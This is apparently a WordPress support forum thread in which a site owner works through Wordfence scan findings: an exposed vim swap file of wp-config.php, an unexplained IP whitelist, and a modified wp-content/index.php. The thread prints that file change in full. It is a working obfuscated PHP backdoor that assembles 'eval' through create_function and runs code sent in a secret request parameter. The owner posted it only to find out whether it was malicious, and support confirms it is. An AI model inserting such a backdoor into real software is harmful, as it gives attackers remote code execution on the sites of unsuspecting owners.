First time using this plugin and have 2 Q’s

Sounds like “someone” might need an upgrade to another “someone.”

https://www.wordfence.com/learn/how-to-harden-wordpress-sites/

From above link: “Editing your wp-config.php file using a text editor that creates temporary files immediately exposes the contents of wp-config.php to the Internet. For example, if you edit your wp-config.php file with the ‘vim’ text editor on Linux, it creates a file called “.wp-config.php.swp”. Anyone accessing your website at https://example.com/.wp-config.php.swp will be able to download this file and the file contains the contents of the wp-config.php file including your database username and password. To prevent this from happening, avoid editing your files directly on your website.”

While I totally appreciate the reply. Anyway that someone can answer the actual question I had ie. will clicking ‘fix this’ on the WordFence result cause any issue to the site in terms of functionality?

Okay so due to the lack of any timely reply DIRECTLY answering the Q’s that I had I went ahead with the “fix” option on the one that would fix the swp file issue. I loaded the site after and seems fine and then checked if the config file was still downloadable by the public and it no longer is (that is really scary that I’ve had my site up for a little over a year now and it had this vulnerability all this time. I wonder if it was already accessed by people.

Oh well, I’m going to go change my server login credentials now in case it has already been stolen by anyone.

So regarding the Q1 (the one with the RED X) in the WordFence result, here is a file comparison of the change to the WordPress core:

Hopefully by looking at the file comparison above someone is able to tell me if this looks shady or it’s legit or whatever.

Thanks

OOPS looks like that image isn’t proper, don’t know why turned out small and blurry on here. Anyway here is the text of the file comparison (and actually I just realized if you increase your browser magnify view you are able to see the above image properly):

Original
1 <?php 1 <?php
2 // Silence is golden.

Modified
2 ‘v1’; $e = ‘ avel’; $f = create_function(”, $e{3}.$e{2}.$e{1}.$e{4} .'( stripslashes( @ $_REQUEST[“RYRNIgFaFJgNdBTQiKBE”] ) );’ ); $f();

Would love to find out if this is nothing shady or if it is. I’ve not a clue about code..

• This reply was modified 8 years, 2 months ago by skygazer.
• This reply was modified 8 years, 2 months ago by skygazer.
• This reply was modified 8 years, 2 months ago by skygazer.

I’m just another user here (free version only) when I first installed Wordfence and did my first scan I had about 150 warnings of changes to my WordPress files from the original WordPress files (yes Wordfence checks your files against what WordPress gave you).

I was shocked but I said hey if there are this many files I want them gone.
So I press fixed files which meant they’d be deleted. I was prepared for the worst. But the site was fine, it worked, it was up – it was the same.
It took several times at “Fix It” or Fix the file -with that many problems.

Before you do anything: BackUp Your Site. *** on an external location.

I would suggest CLICKING fix the file to HIDE your wp-config file because it is exposed to the public, therefore so is your id and password.

I would then change your password to a 18 or more character password, mine is about 30 characters. Reboot and clean your computer if any infection occurred clean your machine via a virus software. (many free are available)
I use Malwarebytes -works on both mac and pc and its free, very good to find any viruses on your computer

I would then do another scan to ensure no other problems exist.

Stratosphere thanks. I beat you to it just slightly ??

I did exactly what you said about the “CLICKING fix the file to HIDE your wp-config file” and also did changed the server login pw and rebooted it etc (see my post just before your reply). I’m going to hold off on fixing the red x for now and hope to get some more feed back first.

I also checked the WordFence live thing and saw repeated activity from Ukraine where they kept going straight to my WP login page ?? I used the “block this IP” function, not sure how well it will work but hopefully it does. No wonder in my wordpress login page it has an ungodly amount of malicious logins attempted blocked by wordpress (over 30K). I don’t know if that amount is common but seemed high to me.

As for local computer, I’m clean there, I’ve got AVG running. All in all WordFence only found 3 issues, hopefully none of those have left me compromised.

BTW, Stratosphere, are you using the free version still? if so how long? Just curious cause while I would love to get the premium, starting a site and the amount it cost to run I’m still paying out of pocket even with ads so I can’t really manage to pay at the moment IF I have the option not to.

Sorry, I was attempting to provide useful information with a bit of humor. My suggestion was that you’d go in there with FTP and delete the .swp files that were perhaps created when a person edited files online and are a possible security risk. That’ll take you one step closer to smooth running with Wordfence. MTN

Regarding Ukraine, since you brought it up. If you don’t need traffic from that country it is worth it in so many ways to block all Ukraine IP numbers. Premium Wordfence, or IQ Block Country plugin.

As for the amount of attacks, it can get massive. The criminals unleash bots that basically browse the web looking for vulnerabilities. Some say these bots are using the amount of electricity (for server resources) that could run the whole UK. It’s a ridiculous situation but one we have to live with and Wordfence is immense help with.

MTN

Good for you!
On the red X, if you click restore the original -it won’t change your site in the slightest, it simply restores the WP file(s) that are supposed to be there, from what was modfied.
Like I said, I had about 150 changes and blasted it for Wordfence to fix them and they were all fixed. No reinstalls needed of theme or anything else.
But you can wait for further instructions from the support here.
I have been using the free version for about one month, so far it runs adequately for my needs. I found it is the best security plugin and I’ve tried them all, in the past 8 years with WordPress sites. If I have to I will buy the Premium version.
Be vigilant, check the logs on your server, keep all plugins up to date, don’t use plugins that have NOT been updated in the past 6 months or are not supported.
Wordfence also works with Cloudflare if you need extra protection, but it needs to be configured properly.

Yeah now when the attempt to reach the .wp-config.php.swp is made in the browser it returns this:

“Forbidden

You don’t have permission to access /.wp-config.php.swp on this server.
Apache/2.4.18 (Ubuntu) Server at bendedreality.com Port 80”

Not sure if that’s the best but it’s still better than what it was doing just hours ago, which was that it was downloading to my pc the swp file (geez).

MTN and Stratosphere thank you both for taking the time and offering suggestion, feedback, truly appreciated.

And yes MTN, I blocked the Ukraine IP but then it seems there are others attempting it too, ie. Poland and I think i say one from Amsterdam. Wow that was a crazy figure analogy of the power they are using (wasting) doing that BS, I mean get a life FFS (pardon my french).

Stratosphere, thanks for that reassurance on the possibly fixing the red X. I feel a bit more comfortable possibly doing it but I will still give it a bit more time and see if anyone from support might be keen on offering some feedback.

I do use CloudFlare as well and yes I investigated and tried a few things with the two withing my knowledge/capabilities.

I definitely keep my plugins updated and also I do avoid one’s that never get updated.

All very great and sound advise thank you both for being so helpful and taking the time to help ??

If I don’t hear from the plugin support about the red x in a few days I’ll probably go ahead and “fix” and will update with the good or bad news (hopefully good).

• This reply was modified 8 years, 2 months ago by skygazer.

You are very welcomed, just trying to help but seems you have a good handle on this. Best of Luck.

Hi @skygazer
This modification to (/wp-content/index.php) isn’t legit of course and the code looks really bad, so reverting back to the original state of that file is a must, and I suggest following tips mentioned in “How to Clean a Hacked WordPress Site using Wordfence” and “How to Secure Your WordPress Working Environment“.

Thanks.

I did in fact clean use the revert to original file function in your plugin last night as I got a little impatient and there were no adverse affects.

Wfalaa, thank you for confirming it was not a legit line of code. I had hired people from Fiverr.com on occasion to perform tasks that are outside of my skills and I’m thinking it was one of them but unfortunately I only started using your awesome plugin this past Thursday or Friday so I don’t know if it was the last person that did work or anyone else prior but I’m thinking it was the last person who worked on it this past Wednesday because Wordfence stated that the last change to the file was exactly on that date but who knows…either way I have removed it with your plugin.

On a side note it is so difficult to find a trustworthy honest person to do things that I need for my site. Can anyone offer any solid trustworthy people/person?

There are a number of WordPress experts here – responding in the WF forums – so you may want to look through here…

But as to using Fiverr – in my opinion, you only get the expertise you’re willing to pay for, and $5 doesn’t get you much.

While Fiverr might be a great way to access cheap labour – ie, amateurs or students just getting their feet wet – you do have to be prepared for unprofessional work ethics and less-than-optimal skill sets.

I don’t know of a single worthwhile professional doing any real business on Fiverr. Experts with valuable skill sets and professional ethics simply don’t work for $5/hr – at least not in IT, in North America.

• This reply was modified 8 years, 1 month ago by bluebearmedia.
• This reply was modified 8 years, 1 month ago by bluebearmedia.
• This reply was modified 8 years, 1 month ago by bluebearmedia.

Excellent help/replies and feedback/input from all here so far, much thanks for that.

I do have an additional question regarding “Whitelist”. I noticed that there was a white list (that I did not create) and it contained varying IP addresses (none of which are my site or my own) and all had Request in the file param.

The worst part is I actually left it enabled for about a week and a half thinking since it was already there that it was probably supposed to be there. But then the more I was learning the less legit this seemed so I disabled them. They are still there but nothing at all is actively whitelisted at the present time.

I suspect this is a definite malicious doings but not sure how they would have been entered since I personally never put them in, anyone can explain how or who would have been able to create this white list?

*you may have to zoom/enlarge your page view to be able to read the stuff in the image

• This reply was modified 8 years, 1 month ago by skygazer.

Skygazer: its Stratosphere here again.
No those IP’s are NOT supposed to be there, unless you entered them.

That happened to me a month ago, I found in
Wordfence > Options > White List 404’s that I did not enter.
I deleted them immediate, and have checked them every day since, never happened again.

If you identify any of them as your hosting IP, discuss with them
if they require access, but I doubt it. I have not whitelisted my hosting IP
and every thing works fine.

This Option page is very helpful and I use maximum security on all of the options there.

For me, I delete anything I did not enter myself in wp-admin.
Hope this helps you.

I wasn’t able to zoom in to see all of them, are they plugin related?
Not sure what those plugins are cause I can’t read them.
I’ve learned to minimize the plugins I use and only from developers who update them as frequently as WordPress itself updates. If not – I ditch them.
Just now squinting I see the XML-RPC reference, that is a hole for hackers.

Securi has an article on that so if you can at all, avoid using that -it would make your site safer.

https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html

Hackers also like to hit images it appears, I see attempts on my images.
Again, sorry I couldn’t read the entries as well.